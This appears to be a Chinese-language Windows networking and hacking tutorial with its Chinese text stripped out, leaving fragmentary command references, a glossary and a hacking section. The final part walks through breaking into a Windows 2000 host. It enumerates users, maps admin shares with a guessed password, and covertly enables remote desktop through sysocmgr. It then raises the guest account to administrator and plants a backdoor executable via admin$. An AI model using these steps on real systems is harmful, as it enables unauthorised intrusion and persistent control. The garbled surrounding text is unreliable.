00:00 [] 23:59 :
/interactive
command , command
/every:
command
date
MTWThFSSu 1 31
date at
/next:
command
command
Windows
.exe .com .bat

.cmd
(UNC)
/?
Schtasks at
schtasks at
schtasks "
"
at
at Administrators
Cmd.exe
At Cmd.exe
(.exe) Cmd.exe
at
Status ID Day Time Command Line
OK 1 Each F 4:30 PM net send group leads status due
OK 2 Each M 12:00 AM chkstor > check.file
OK 3 Each F 11:59 PM backup2.bat
(ID)
(ID) at
Task ID1
Status:OK
Schedule:Each F
Time of Day:4:30 PM
Command:net send group leads status due at
at
"
"
at
(>)
at
(^) Output.text
at 14:45 c:\test.bat ^>c:\output.txt
systemroot
at
at at
" "
" "
UNC
at 1:00pm my_backup \\server\share
x: ?
at 1:00pm my_backup x:
at
at
Marketing
at \\marketing
Corp 3
at \\corp 3
8:00 Corp
Maintenance Corp.txt Reports
at \\corp 08:00 cmd /c "net share reports=d:\marketing\reports
>> \\maintenance\reports\corp.txt"
Marketing
Archive.cmd
at \\marketing 00:00 /every:5,10,15,20,25,30 archive

at
at /delete
(.exe)
cmd /c Cmd.exe
14.Rsh
RSH Windows XP Windows 2000
RSH Windows 2000 Server Resource Kit Rshsvc.exe
RSH
rsh
rsh [Host] [-l UserName] [-n] [Command]
Host
command
-l UserName
-n
rsh NULL
Command
/?
rsh command
command
command Rsh

">
>"
"RemoteFile""LocalFile"
rsh othercomputer cat remotefile >> localfile
Remotefile otherremotefile
rsh othercomputer cat remotefile ">>" otherremotefile
rsh
Windows XP Professional

rsh
.rhosts
.rhosts UNIX
.rhosts
.rhosts
rcprexec rsh
.rhosts
(#)
host7 #This computer is in room 31A
.rhosts
.rhosts
(TCP/IP)
admin1
vax1 telcon
rsh vax1 -l admin1 telcon
15.Tftp
(TFTP) daemon
UNIX (TFTP) daemon
UNIX
tftp [-i] [Host] [{get | put}] [Source] [Destination]
-i
-i
ASCII (EOL)
Host
put
Destination Source
TFTP
get
Destination Source
Source
Destination
Destination Source
/?
get
FileTwo
FileOne put FileTwo
FileOne get
Windows XP Windows 2000 TFTP Windows
2000 TFTP Windows XP Windows 2000
(TCP/IP)
Users.txt vax1
Users19.txt
tftp vax1 put users.txt users19.txt
16.Nbtstat

nbtstat [-a RemoteName] [-A IPAddress] [-c] [-n] [-r] [-R] [-RR] [s] [-S] [Interval]
-a remotename
NetBIOS RemoteName
NetBIOS NetBIOS
NetBIOS
-A IPAddress
NetBIOS IP
-c
NetBIOS NetBIOS
-n
NetBIOS Registered
WINS
-r
NetBIOS WINS Windows XP
WINS
-R
NetBIOS Lmhosts
#PRE
-RR
WINS NetBIOS
-s
NetBIOS IP
-S
NetBIOS IP
Interval
Interval
CTRL+C netstat
/?
Nbtstat
Nbtstat
Input
Output
In/Out
Lift
Local Name NetBIOS
Remote Host IP
<03> NetBIOS NetBIOS
16
<20>
ASCII
Type
Status NetBIOS ""
""
State NetBIOS
NetBIOS

IP

IP
TCP

(TCP/IP)
NetBIOS
CORP07
NetBIOS
nbtstat -a CORP07
IP 10.0.0.99
NetBIOS
nbtstat -A 10.0.0.99
NetBIOS
nbtstat -n
NetBIOS
nbtstat -c
NetBIOS Lmhosts
#PRE
nbtstat -R
WINS NetBIOS
nbtstat -RR
5 IP NetBIOS
nbtstat -S 5
17.Netstat
TCP IP IPv4
IPICMPTCP UDP IPv6
IPv6ICMPv6 IPv6 TCP

netstat [-a] [-e] [-n] [-o] [-p Protocol] [-r] [-s] [Interval]
-a
TCP TCP UDP
-e
-s
-n
TCP
-o
TCP
ID (PID) Windows
"
"
PID -a-n -p
-p Protocol
Protocol Protocol
tcpudptcpv6 udpv6 -s
Protocol tcpudpicmpiptcpv6udpv6icmpv6 ipv6
-s
TCP UDPICMP IP
Windows XP IPv6
IPv6
TCPIPv6 UDPICMPv6 IPv6
-p
-r
IP route print
Interval
Interval CTRL+C
netstat
/?
(-) (/)
Netstat
Proto
TCP UDP
Local Address
IP -n IP
*

Foreign Address
IP -n
IP *
(state)
TCP
CLOSE_WAIT
CLOSED
ESTABLISHED
FIN_WAIT_1
FIN_WAIT_2
LAST_ACK
LISTEN
SYN_RECEIVED
SYN_SEND
TIMED_WAIT
TCP RFC 793
(TCP/IP)
netstat -e -s
TCP UDP
netstat -s -p tcp udp
5 TCP
ID
nbtstat -o 5
TCP
ID
nbtstat -n -o
18.Runas
runas
[{/profile|/noprofile}]
[/env]
[/netonly]
[/smartcard]
[/showtrustlevels] [/trustlevel] /user:UserAccountName program
/profile
/profile
/no profile
/noprofile
/env
/netonly
/smartcard
/smartcard
/showtrustlevels
/trustlevel
/trustlevel
/showtrustlevels
/user:UserAccountName

user@domain domain\user
/user
/?
runas
runas "
"
runas Administrator Administrator
runas MMC
"
"
Administrator /user:
/user:AdministratorAccountName@ComputerName
/user:ComputerName\AdministratorAccountName
/user:AdministratorAccountName@DomainName
/user:DomainName\AdministratorAccountName
runas (*.exe) MMC (*.msc) MMC
"
""Users""Power Users"
runas MMC "
"
MMC "
".
runas
runas MMC "
"
"
" Windows 2000

runas
runas
RunAs RunAs
"
"
""""
Windows 2000
runas /user:localmachinename\administrator cmd
companydomain\domainadmin "
"
runas /user:companydomain\domainadmin "mmc
%windir%\system32\compmgmt.msc"
domain.microsoft.com user ""
runas /user:user@domain.microsoft.com "notepad my_file.txt"
MMC
runas /netonly /user:domain\username "command"

domain\username
19.Route
IP route
route
[-f]
[-p]
[Command
[Destination]
[mask
Netmask]
[Gateway] [metric Metric]] [if Interface]]
-f
255.255.255.255
127.0.0.0 255.255.255.0
224.0.0.0 240.0.0.0
addchange delete
-p
add TCP/IP
IP TCP/IP print
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Par
ameters\PersistentRoutes
Command

add
change
delete
print
Destination
IP
0 IP
0.0.0.0
mask subnetmask
IP 255.255.255.255
0.0.0.0 255.255.255.255
0 1
Gateway
IP IP
IP
metric Metric
1 ~ 9999
if Interface
route print
0x if

/?
TCP/IP LAN IP
LAN
TCP/IP
systemroot\System32\Drivers\Etc
Destination"" (DNS)
IP
Gateway DNS systemroot\System32\Drivers\Etc
NetBIOS
print delete Gateway
Destination (*) (*)
(?)
10.*.1, 192.168.* 127.* *224*
"Route:bad
gateway address netmask" 1
0
1 0
1
Windows NT 4.0Windows 2000Windows Millennium Edition
Windows XP route -p
Windows 95 Windows 98 route
(TCP/IP)
IP
route print
IP
10.
route print 10.*
192.168.12.1
route add 0.0.0.0 mask 0.0.0.0 192.168.12.1
10.41.0.0 255.255.0.0
10.27.0.1
route add 10.41.0.0 mask 255.255.0.0 10.27.0.1

10.41.0.0 255.255.0.0
10.27.0.1
route -p add 10.41.0.0 mask 255.255.0.0 10.27.0.1
10.41.0.0 255.255.0.0
10.27.0.1
7
route add 10.41.0.0 mask 255.255.0.0 10.27.0.1 metric 7
10.41.0.0 255.255.0.0
10.27.0.1 0x3
route add 10.41.0.0 mask 255.255.0.0 10.27.0.1 if 0x3
10.41.0.0 255.255.0.0
route delete 10.41.0.0 mask 255.255.0.0
IP
10.
route delete 10.*
10.41.0.0 255.255.0.0
10.27.0.1 10.27.0.25
route change 10.41.0.0 mask 255.255.0.0 10.27.0.25
windowsserver cmd ip -> Windows 2k/2003
Server
ip
Windows2000
Unix ip
C:\>ipconfig (ipconfig ip )
Ethernet adapter :
Connection-specific DNS Suffix .:
IP Address............: 10.1.1.94 ip
Subnet Mask ...........: 255.255.255.0
Default Gateway .........: 10.1.1.254
C:\>netsh
netsh>interface
interface>ip
interface ip>set address " " static 10.1.1.111
255.255.255.0 10.1.1.254
interface ip>exit
set :
set address - IP
set dns - DNS
set wins - WINS
IPCONFIG
C:\>ipconfig ipconfig
,
Ethernet adapter :
IP Address............: 10.1.1.111
Subnet Mask ...........: 255.255.255.0
Default Gateway .........: 10.1.1.254
..-
? -
aaaa - àaaa'
abort -
add -
alias -
bye -
commit -
delete -
dhcp - `dhcp'
dump -
exec -
exit -
help -
interface - ìnterface'
offline -
online -
popd -
pushd -
quit -
ras - `ras'
routing - `routing'
set -
show -
unalias -
wins - `wins'
IP

IP Win2000 IP Win98
IP
IP
?
Win2000 netsh
""
"cmd" netsh
netsh
int ip
IP dump IP

netsh>
netsh>int ip
interface ip>dump
# ---------------------------------# IP
# ---------------------------------pushd interface ip
# IP
set address name =
source = static addr =
192.168.0.5 mask = 255.255.255.0

=1
set dns name = source = static addr = 61.237.17.181
add dns name = addr = 211.97.168.129
add dns name = addr = 211.98.4.1
set wins name = source = static addr = none
# 2 IP
set address name = 2 source = dhcp
set dns name = 2 source = dhcp
set wins name = 2 source = dhcp
popd
# IP
IP 2
netsh IP "set
address name = source=static
addr=IP mask="
netsh IP 192.168.0.7
255.255.255.0
netsh>int ip
interface ip>set address name =" "source = static addr
= 192.168.0.7 mask = 255.255.255.0
interface ip>exit
ipconfig
C:\Documents and Settings\Administrator>ipconfig
Ethernet adapter 2
Media State ........... Cable Disconnected
Ethernet adapter
IP Address............ 192.168.0.7
Subnet Mask ........... 255.255.255.0
Default Gateway ......... 192.168.0.2
Win2000
IP IP
int ip
set address name= source=static addr=192.168.0.7
mask=255.255.255.0
"7.sh" C C
"netsh exec 7.sh" ? ipconfig
IP
"7.bat" "netsh exec

7.sh" IP
192.168.0.5192.168.0.7
IP
"addr" IP
172.19.96.7
IP
int ip
set address name = source = static addr= 172.19.96.7
mask = 255.255.255.0
=1
ipconfig/all
IP ?
netstat
netstat TCP/IP netstat -a
netstat -r netstat -e
Ethernet
netstat -s netstat -n
Tracert IP
Tracert IP (TTL) ICMP
-d IP
-h maximum_hops target_name
-j host-list Tracert
-w timeout timeout
target_name IP
pathping
ping tracert
pathping
-n Hostnames
-h Maximum hops
-g Host-list
-p Period ping
-q Num_queries
-w Time-out
-T Layer 2 tag 2 IEEE 802.1p
2
-T
(QoS)
-R RSVP test Che "

(RSVP)" -R

(QoS)
DHCP

netsh
netsh>(Netshell) "dhcp"
dhcp> DHCP
server \\servername server ip_address
" servername
"
DHCP Netshell
/? help
DHCP list DHCP
Netshell
route
routing ip add/delete/set/show interface
IP
routing ip add/delete/set/show filter
IP
routing ip add/delete/show boundary
routing ip add/set ipiptunnel IP

IP
routing ip add/delete/set/show rtmroute
routing ip add/delete/set/show persistentroute
routing ip add/delete/set/show preferenceforprotocol
routing ip add/delete/set/show scope

routing ip set/show loglevel IP
routing ip show helper IP Netsh
routing ip show protocol IP

routing ip show mfe
routing ip show mfestats
routing ip show boundarystats IP
routing ip show r*estinations
routing ip show rtmroutes
routing ip nat set/show global (NAT)
routing ip nat add/delete/set/show interface

NAT
routing ip nat add/delete addressrange NAT
routing ip nat add/delete addressmapping NAT
routing ip nat add/delete portmapping NAT
routing ip autodhcp set/show global DHCP
routing ip autodhcp set/show interface

DHCP
routing ip autodhcp add/delete exclusion DHCP
routing ip dnsproxy set/show global DNS
routing ip dnsproxy set/show interface DNS
routing ip igmp set/show global IGMP

routing ip igmp add/delete/set/show interface
IGMP
routing ip igmp add/delete staticgroup
routing ip igmp show grouptable IGMP
routing ip igmp show ifstats IGMP
routing ip igmp show iftable IGMP
routing ip igmp show proxygrouptable IGMP
IGMP
routing ip igmp show rasgrouptable

Internet
routing ip ospf set/show global OSPF

routing ip ospf add/delete/set/show interface
OSPF
routing ip ospf add/delete/set/show area
OSPF
routing ip ospf add/delete/show range OSPF
routing ip ospf add/delete/set/show virtif

OSPF
routing ip ospf add/delete/show neighbor
OSPF
routing ip ospf add/delete/show protofilter
OSPF
routing ip ospf add/delete/show routefilter
OSPF
routing ip ospf show areastats OSPF
routing ip ospf show lsdb OSPF

routing ip ospf show virtifstats OSPF
routing ip relay set global "DHCP "
routing ip relay add/delete/set interface
"DHCP "
routing ip relay add/delete dhcpserver DHCP
DHCP IP
routing ip relay show ifbinding IP
routing ip relay show ifconfig "DHCP

"
routing ip relay show ifstats DHCP
routing ip rip set/show global IP RIP

routing ip rip add/delete/set/show interface
IP RIP
routing ip rip add/delete peerfilter RIP
routing ip rip add/delete acceptfilter

RIP
routing ip rip add/delete announcefilter
RIP
routing ip rip add/delete/show neighbor RIP
routing ip rip set/show flags IP RIP
routing ip rip show globalstats RIP
routing ip rip show ifbinding IP

routing ip rip show ifstats RIP
IPX netsh
routing ipx add/set staticroute IPX IPX
routing ipx add/set staticservice SAP SAP
routing ipx add/set filter IPX

routing ipx add/set interface IPX
IPX
routing ipx set global IPX
routing ipx rip add/set filter RIP
routing ipx rip set global IPX RIP
routing ipx rip set interface IPX RIP
routing ipx sap add/set filter SAP
routing ipx sap set global IPX SAP
routing ipx sap set interface IPX SAP
routing ipx netbios add nbname NETBIOS IPX

NetBIOS
routing ipx netbios set interface IPX
NetBIOS
WINS NetSh
list WINS
dump WINS
add name add name /?
add partner add partner /?
add pngserver Persona Non Grata
add pngserver /?
check database check
database /?
check name WINS
check name /?
check version check
version /?
delete name
delete name /?
delete partner
delete partner /?
delete records
delete records /?
delete owners delete
owners /?
delete pngserver Persona Non Grata
delete pngserver /?
init backup WINS init backup /?
init import Lmhosts init import /?
init pull "" WINS
init pull /?
init pullrange WINS
init pullrange /?
init push "" WINS
init push /?
init replicate init
replicate /?
init restore init restore /?
init scavenge WINS init
scavenge /?
init search WINS init search /?
reset statistics reset
statistics /?
set autopartnerconfig
set autopartnerconfig /?
set backuppath set
backuppath /?
set burstparam set
autopartnerconfig /?
set logparam set
logparam /?
set migrateflag set
migrateflag /?
set namerecord set
namerecord /?
set periodicdbchecking
set periodicdbchecking /?
set pullpartnerconfig ""
set pullpartnerconfig /?
set pushpartnerconfig ""
set pushpartnerconfig /?
set pullparam " " set
pullparam /?
set pushparam " " set
pushparam /?
set replicateflag set
replicateflag /?
set startversion ID set
startversion /?
show browser [1Bh]
show browser /?
show database
show database /?
show info show info /?
show name show
name /?
show partner """"
""
show partner /?
show partnerproperties show
partnerproperties /?
show pullpartnerconfig ""
show pullpartnerconfig /?
show pushpartnerconfig ""
show pushpartnerconfig /?
show reccount
show reccount /?
show recbyversion
show recbyversion /?
show server show server /?
show statistics WINS show
statistics /?
show version WINS
show version /?
show versionmap ID ""
show versionmap /?
Interface
interface set/show interface
interface set/show credentials
WAP

RFC1459 IRC
DCC
UNIXLinuxMacBSDWindows2000Windows95/98/MeWindows NT
Linux
Apache

Windows2000 Ftpd
ftp
IP

IP IP

IP
IP
IP IP
IP
IP

65535 65535

80
IRC

6667
1026

Perl

IP
DES
1
Internet: International Net
1969
Internet
(Email) (Telnet)
(Finger)(FTP)(Archive)
(Usenet)
(BBS)(News Group)(World Wide

Web WWW)
BBS Bulletin Board System Public Access

Message System,
WWW: World Wide Web

Internet
Remote Login: ()
Internet
HTTP: Hyper Text Transmission Protocol,

IPIP
FTP
Transfer Protocol Internet
FTP
FTP
Gopher: guf()
Internet
FTP() Telnet(IP )
Internet
Archive: a:kaiv , Internet

Internet FTP
WAIS
Wide Area Information Service
Internet
Luisitserv: Internet
IRCInternet Relay Chat,
Hypertext:
( )
Hyperlink:
HTML: Hyper Text Markup Language,
Tim Bemers Lee WWW()
WWW

HTML
(Home Page)
HTML
HTML WWW
Hypermedia:
Navigator: (Netscape) Internet Navigator

Internet
Navigator (WWW)(Email)(FTP)
(Telnet)(News Group)(Gopher)
IEInternet Explorer,Explorer
2
VF
VFPVisual FoxPro Visual

Fox
Pro Progress
Visual FoxPro Microsoft FoxPro
VCVisual C C
C BASIC
C
VBVisual Basic
BASIC Beginners All purpose Sybolic Instruction Code(
) BASIC Quick BASICTure BASIC
Microsoft Visual Basic
Delphidelfai
(Borland)
Java
/dav()
(Sun)Java
Internet
Java Write Once,Run anywhere(
)
PC UNIX
PDA()
SQLStructure Query Language
SQL
3
PCPersonal Computer
NC: Network Computer
MPC: Multimedia Personal Computer

MMX: MultiMedia eXtensions() CPU
MMX CPU (Video Signal)
(Audio Signal) (Graphical Manipulation) 57
MMX CPU ()
Intel Pentium 166MHz MMXTM: Intel Pentium (Intel)

CPU Registered()166MHz CPU
MHz Mega
Hertz MMXTM
TM Trade Mark
OOP: Object Oriented Programming,
28VGA: 28 ()
100
VGA Video
Graphics Array()
FATAllocation Table,
EPAEnvironmental Protection Agency EPA

1992 (Energy Star)

()
EPA EPA POLLUTION
PREVENTER
IC Intelligent Card,
ATX
IDE
DLLDynamic Link Library,
KBKilo ByteKB K=Kilo
B=Byte (
)
MBMega ByteMB M=Mega
GBGiga Byte,GB G=Giga
CAIComputerAsisted Instruction ComputerAided Instruction,
CADComputerAided Design
ISO International Standard Organization, ISO
1987 ISO 9000 1994
ISO 9000
1.ISO 90001:1994
2.ISO 9001:1994
3.ISO 9002:1994
3DS 3D Studio: Three Dimension Studio,
Autodesk
AutoCAD
VGA
VRVirtual Reality 3D
OCROptical Character Recognition( )

OCR
OCR TH
OCR NT for Windows
SCSISmall Computer System Interface,
OEMOriginal Equipment Manufacturer,

Microsoft OEM: OEM
Windows98Windows NTWorkStationWindows3.XMSDOS
MISManagement Information System,
MIS MISQuick MIS

PNPPlug and Play
Window98
PNP PC
(IRQ) (DMA)
Windows98 IRQ
DMA
OLEObject Linking and Embedding, OLE
OLE
()
(Component Object Model), COMOLE
MIDI Musical Instrument Digital Interface,

MIDI
MIDI
MIDI MIDI
(FM )
MPEG
Motion Picture Experts Group

MPEG MPEG
MPEG
MPEG
10
ADSL
ADSLAsymetric Digital Subscriber Loop
640Kbps
7Mbps
1.
2.
3.
4.
5. INTERNET
INTERNET
MODEM
INTERNET
ADSL
ASP
ASP Active Server Pages
VBscript Java Script

ASP
HTML
ASP CGI

Web
Internet
Web Web
Web Web
B2B
www.Alibaba.com
B2B
B2C
Internet

www.amazon.comwww.1hao.com
BBS
BBS

BBS Unix WWW BBS Unix
BBS Telnet BBS
BBS BBSbbs.gznet.com

CNNIC
CNNIC 1997 6 3
CNNIC
CNNIC
CNNIC CNNIC
CNNIC
CNNIC Internet Internet

CNNIC
(InterNIC)
(APNIC)
CEO
CEO Chief Executive Officer
CIO
CIO Chief Information Officer
CTO
CTO Chief Technology Officer
COO
COO Chief Operation Officer
CFO
CFO Chief Financial Officer
CGO
CGO Chief Government Officer

Plug-in
Web
DDN
DDNDigital Data NetworkDDN

A B
DDN
N*64k 2M
DDN
1"
"
POS
2"
"
3

EC E-Commerce
Internet
BtoB B2B
BtoC B2C CtoC
C2C CtoB C2B
www.Alibaba.comwww.8848.netwww.1hao.com
E-mail
E-mail
Email yourname@xxx.xxx
yourname@yahoo.com
@ at
Internet
E-mail Internet
Internet E-mail
www.163.net
FTP
FTP File Transfer Protocol Internet
Internet
Internet
FTP CutFTP
FTP
FAQ
FAQ Frequently Asked Questions
FAQ
Firewall
Homepage
Pages Web Internet Web
Homepage Pages
Homepages Pages
www.microsoft.comwww.ibm.com
Homepage
Pages Web Internet Web
Homepage Pages
Homepages Pages
Supercool.163.netcarboy.163.net
HTTP
HTTPHypertext Transfer Protocol WWW
WWW HTTP TCP/IP

Hacker
Internet
Internet 70
ARPA
Internet
LANMAN
WAN
Internet
Internet
ISP
ISPInternet Service Provider Internet
ISP InternetISP

ISP
ICP
ICP(Internet Content Provider) Internet ICP
ICP
ICQ
ICQ I seek you

ICQ www.icq.com
IP
IP Internet
IP 32
202.112.223.12
IP ABC IP
IP
ABC
0.0.0.0-127.255.255.255
128.0.0.0-191.255.255.255
192.0.0.0-223.255.255.255
IP
IP
NIC Internet
IP
IP
IP VoIPVoice over Internet protocol
Internet
VocalTec
163
163
163
Modem 163
www.163.com
163 www.163.net
ISOC
ISOCInternet Society
1992 (
)
(IAB)
(IETF) (IESG)
(IEPG) (IANA)
Intranet
Internet
Internet
Web Web
FTP Internet
wideband transmission
20

Browser
WWW
WWW
Microsoft Internet Explorer IE

Netscape Navigator Opera

Offine
WWW
MODEM
MODEM

Modem
Modem
Modem
POP3
POP3 Post Office Protocol version3 3
POP3
SMTP
SMTP Simple Mail Transmission Protocol
SMTP

WWW
WWW
www.yahoo.comwww.sohu.com
Upload

Downloan Down
SET
SET Secure Electronic Transaction VISA
MasterCard 1997 5 SET
SET
SET SSL
SSL
SSL Secure Socket Layer Netscape
SSL SSL
SQL
SQL sequel S-Q-L
MICROSOFT

WAP
WAP Wireless Applecation Protocol

TCP/IP WAP WAP
GSM
WAP WML
WAP
E-mail
Nokia7110Siemens3568iMotorola a6188
WWW
WWW World Wide Web
Web
WWW
News FTP
Telnet Gopher Mail
www.sina.com.cnwww.163.com
WWW

Web
ServerFTP ServerMail Server
Database Server

www.yahoo.comwww.163.net

TCP/IP IPX/SPX
NetBIOS TCP/IP
IPX/SPX. Internet TCP/IP

Internet
Internet
Internet
Internet
BBS Fido

Internet WWWFTPEmail
32
IP Internet
www.cctv.com Internet
.com .net
.edu .gov().mil .org
cnus
ukhksupercool.163.net
ISDN
ISDN Intergrated Services Digital Network

ISDN

8 2
2 64Kbps
128Kbps

Internet Internet

Online

Payment Gateway Internet
Internet

Internet
11
[hacker]
(hacker) hack

()
50
6070

(password cracking)
(trapdoor)(backdoor)(Trojan horse)
"",.
.
"",.
() Trojan house
[]
,,
!
, ,
, ,
,.
rootkit
Rootkit rootkit

wtmputmp lastlog rootkit
telnetshell finger
/var/log /var/adm
,
,.
IPC$
IPC$(Internet Process Connection) " "
IPC$ NT/2000 IP
NT/2000 ipc$
(c$,d$,e$ )
winnt
windows(admin$)
[],
Windows 2000/XP/2003
$
C$D$E$ Winnt Windows[admin$]
shell
shellshell
shell :
webshell
"web" - web ,"shell" -
webshell ( ) WEB
WEB
,
"".
,.
[]

http://www.xxx.com/soft.asp?id=123

domain d
1. WHOIS
2.
3.
webshell
4.
:Serv-u IIS
LOG
5. Admin )
6. ASP
[]
,,?
,
VIP
.,
, . ,
, VIP
,.
?
Computer Virus

?

clientserver
?
Firewall
?
Back Door
NIDS
NIDS Network Intrusion Detection System
Hacker Cracker
NIDS

Hub
SYN ?
TCP SYN
?
Worm1988 22
Robert Morris
UNIX Worm 6000
200 6000
CERT
99
Unix
Finger
Mail

DDoS
DDoS
ARP
ARP IP
MAC
ARP
ARP Mac
ARP
:
1. XXX XXX
2.
ARP
:HONEYPOT HONEYPOT
:IP ARP DNS Web
12
135137138139445
?
192.***.xx.x
IP 4
45
Standard: Solaris 2.x, Linux 2.1.???, Linux 2.2, MacOS
Telnet (23/tcp)
ssh (22/tcp)
ftp (21/tcp) (
)
netstat (15/tcp)
daytime (13/tcp)
systat (11/tcp)
echo (7/tcp)
time (37/tcp)
smtp (25/tcp)
www (80/tcp) (
)
finger (79/tcp)
auth (113/tcp)
sunrpc (111/tcp)
pop-2 (109/tcp)
linuxconf (98/tcp)
imap2 (143/tcp)
printer (515/tcp)
shell (514/tcp)
login (513/tcp)
exec (512/tcp)
unknown (693/tcp)
unknown (698/tcp)
unknown (727/tcp)
swat (910/tcp)
unknown (1025/tcp)
unknown (1039/tcp)
unknown (1038/tcp)
unknown (1037/tcp)
unknown (1035/tcp)
unknown (1034/tcp)
unknown (3001/tcp)
unknown (6000/tcp)
echo (7/udp)
general/tcp
daytime (13/udp)
unknown (728/udp) (
)
unknown (2049/udp)
unknown (681/udp)
unknown (2049/tcp)(
)
telnet (23/tcp)
(21/tcp)
/incoming
ftp
(21/tcp)
ftp TELNET
CWD ~XXXX CWD ROOT
(guest),
13/tcP(daytime)

udp
UDP
ECHO(7/tcp)
(25/tcp)smtp
EXPN VRFY
EXPN
VRFY
user@hostname1@victim
user@hostname1
WWW(80/TCP)
WWW
finger (79/tcp)
finger
auth (113/tcp)
ident
(
ROOT )
(98/tcp) LINUX
(513/tcp) RLOGIN
TELNET
exec (512/tcp)
rexecd ,
IP
135 FTP 135

2004

UNIX UNIX 0
WIN2000
WIN2K
230M

PING
5.0 GOOGLE N
NSS
NSS Perl
Sendmail
FTP
NFS
TFTP
Hosts.equiv
Xhost
NSS Hosts.equiv
NSS
AppleTalk
Novell
LAN

NSS
Ping
NSS
NSS NSS
$TmpDir_NSS
$YPX-ypx
$PING_ ping
$XWININFO_xwininfo
Perl include
Perl include
PATH
NSS ftplib.pl NSS
NSS
NSS
NSS
http://www.giga.or.at/pub/hacker/unix
Strobe TCP
strobe TCP strobe
strobe
strobe strobe
strobe
socket
strobe
strobe Solaris 2.3
getpeername()
-g
strobe
ISS strobe
/var/adm/messages
SATAN
SATAN UNIX C Perl
HTML UNIX
Linux SATAN
Linus tcp-scan
select()
fping
socket
Linux SATAN diff
ftp.lod.com
Sun sunsite.unc.edu diff
/pub/linux/system/network/admin/satan-linux.1.1.1.diff.gz
SATAN
FTPD
FTP
NFS
NIS
RSH
Sendmail
X
SATAN http://www.fish.com
SATAN SATAN
/satan-1.1.1 Perl
reconfig
PATH DNS
DNS /satan-1.1.1/conf/satan.cf
$dont_use_nslookuo=1
IRIX SunOS
SATAN
SATAN
100
SATAN
Jakal
Jakal
half scans
SYN/ACK
Courtney GAbriel
Half lifeJeff(PhiJi)Fay Abdullah Marahie
Jakal http://www.giga.or.at.pub/hacker/unix
IdentTCPscan
IdentTCPscan TCP
UID
.CONNECT
CONNECT bin/sh
TFTP
FSPScan
FSPScan
FSP
FSP FTP Internet
FSP *FSP
FTP FTP
E-mail FSP
Windows OS/2 GUI

XSCAN
XSCAN X
XSCAN
XSCAN
SSSShadow
Security Scanner
http://www.20cn.net/cgi-bin/download/down.cgi?list=scaner
SSS
NAMP
http://www.91one.net/dvbbs/dispbbs.asp?
boardid=17&id=1362&star=1#1362

PING
shellshell UNIX
xx
SHELL
http://www.91one.net/dvbbs/dispbbs.asp?boardid=17&id=1426
,
shell telnetshell
telnet
winshell
http://978229.myrice.com/tty/Preview.htm#MAILLISTDOC19
shell
Win2K
http://www.yesky.com/20010530/182273.shtml ;
Microsoft
SQL
Server
Webtasks
http://www.mhdn.net/se/2002-11-08/6386.html
Linux
kernel
ptrace
http://www.softhouse.com.cn/docs/southpark2169.html
IIS
http://moon-soft.com/e_commerce/soft/doc/readelite572760.htm
win2000
D
shell
Shell ?
UNIX
Shell(DOS command UNIX )Shell
dos
command.com
shell

13
3389

3389
3389

(

scanner3.0 xscan scanner IP
scanner 3389
IP
3389 IP
IP TXT
xscan
SQL-Server NT-Server

IP TXT
3.0 mstsc

cmd.exenet use
net view\\
!

Windows Macintosh UNIX
*
Windows
Windows Windows 2000
Windows
Windows 2000
Windows 2000 Professional
Windows 2000
Windows 2000
MS-DOS Windows
Macintosh
UNIX
MS-DOSMacintosh UNIX
Windows 2000 Professional
Windows 2000 Server
Windows 2000 Server

Windows 2000 Server

Windows 2000 Server
Windows Windows CE (RDP)

Windows
(DFS) (DFS)
DFS DFS
Windows 2000 Server
Windows 2000
Server
Windows 2000 Server Active Directory
Windows 2000 Server
Windows 2000 Server Windows 2000 Server

Windows 2000 Server
40 128 128
TCP/IP
Windows 2000 Server
RDP-TCP
RDP RDP
RDP-TCP

/ Internet
Citrix CA
Citrix CA Citrix CA
Citrix CA TCP/IP
IPX/SPX
NetBIOS
3389
3389 . 3389
,M$
, :winnt4/win2000server/win2000ADVserver/win2000DS/XP .
winnt4
,2000 ,.
, win2000server server .(
).
..
: 192.168.0.1
: administrator
: 7788
2000
c:\winnt
,2000 ,
.
: c:\>letmein \\192.168.0.1 -all -d
stating connecting to server ...
Server local time is: 2002-1-13 10:19:22
Start get all users FORM server...
-------------------------Total = 5
-------------------------num0= Administrator ()
num1= Guest ()
num2= IUSR_servername (Internet )
num3= IWAM_servername ( IIS )
num4= TsInternetUser (TsInternetUser)
-------------------------Total = 5
-------------------------- num2/3/4 2000server
.
2000 .
:
:superscan3.exe
25,3372 2000server .
,
:cmdinfo.zip
2 NT/2K
,
,
,PACK ,
, ,
.
.
,:,
, .
3 ,
,
cmdinfo
2000 , 3389 .
? :?3389
, ,
3389
?
1.
termservice "
">>>""
.
2.
RDP "
">>>""
.
3.
3389 . 3389
4..
5.
.
6.....(
)
, 5 .
.,
C Z
net use z: \\192.168.0.1\c$ "7788" /user:"administrator"
Z
,
Z:\Documents and Settings\All Users\\\
>
"
"""
,,(98% )
telnet .,
,
:
telnet , ., 2000
telnet ,
,.(~,!)
,.
.abu. WIN2K TELNET
,
(
,),
telnet .
23
,
telnet 192.168.0.1
/
*======================================
=========================
Microsoft Telnet
*======================================
=========================
C:\>
\\
!!!! ,
:
c:\>query user
. .
:
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
>w1 console 0 .2002-1-12 22:5
\\,
.!,
.
--------------------------------------------------C:\>dir c:\sysoc.inf /s // INF
c:\WINNT\inf 2000-01-10 20:00 3,770 sysoc.inf
1 3,770
----------------------------------------------------C:\> dir c:\sysocmgr.* /s //
c:\WINNT\system32 2000-01-10 20:00 42,768 sysocmgr.exe
1 42,768
----------------------------------------------------c:\>echo [Components] > c:\wawa
c:\>echo TSEnable = on >> c:\wawa
//
c:\>type c:\wawa
[Components]
TSEnable = on
//
-----------------------------------------------------c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\wawa /q

----------------------------------------------------.
/R
/R
.,,
,
3389 ..
: A
,/R,
,
:iisreset /reboot
,
, , .B
, .C sysocmgr
,
,, sysocmgr ,,
.,
B .
C ,?
( )
WIN2000
WIN2000
WIN2000
WIN2000
3389
WIN2000
WIN2000
3389
WIN2000
CTRL+SHIFT
URL
WIN2000
"c:\winnt\system32"
SYSTEM32
"net.exe""net.exe"
> >c:\winnt\system32\net.exe "user guest
/active :yes" net.exe
guest
"user add"
guest
"user guest " guest
localgroup administrators guest /add guest
id
ip
"guest" guest
Microsoft
net use \\IP Address\IPC$ ["password"] /user:"guset" IPC

Telnet
Tools Srv.exe, ntml.xex
Telnet
99
copy c:\hack\srv.exe \\***.***.***.***\admin$
net time \\***.***.***.***
\\***.***.***.*** 2001/1/8 08:55
srv.exe:
